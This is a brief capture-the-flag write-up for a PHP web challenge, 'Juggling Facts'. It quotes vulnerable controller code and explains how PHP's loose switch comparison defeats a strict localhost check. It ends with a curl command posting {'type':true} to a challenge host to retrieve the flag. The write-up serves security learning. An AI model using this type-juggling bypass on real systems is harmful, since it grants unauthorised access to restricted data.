[Web] Juggling Facts

This web application is written in PHP, and serves facts from an API endpoint

$router = new Router();
$router->new('GET', '/', 'IndexController@index');
$router->new('POST','/api/getfacts', 'IndexController@getfacts');

The function getfacts returns the flag only if the type is set to the string secrets (type validation with ===) in the JSON payload, and has a limitation on the IP requesting it, which must be local

    public function getfacts($router)
    {
        $jsondata = json_decode(file_get_contents('php://input'), true);

        if ( empty($jsondata) || !array_key_exists('type', $jsondata))
        {
            return $router->jsonify(['message' => 'Insufficient parameters!']);
        }

        if ($jsondata['type'] === 'secrets' && $_SERVER['REMOTE_ADDR'] !== '127.0.0.1')
        {
            return $router->jsonify(['message' => 'Currently this type can be only accessed through localhost!']);
        }

Once this round of validation is done, the json is passed in a switch, for it to call the corresponding method

        switch ($jsondata['type'])
        {
            case 'secrets':
                return $router->jsonify([
                    'facts' => $this->facts->get_facts('secrets')
                ]);

The problem is that switch is vulnerable to type juggling (hence the name of the challenge). Setting type to true, we can pass the validation, and still end up in the first branch of the switch

$ curl -vd '{"type":true}' 178.62.85.130:32116/api/getfacts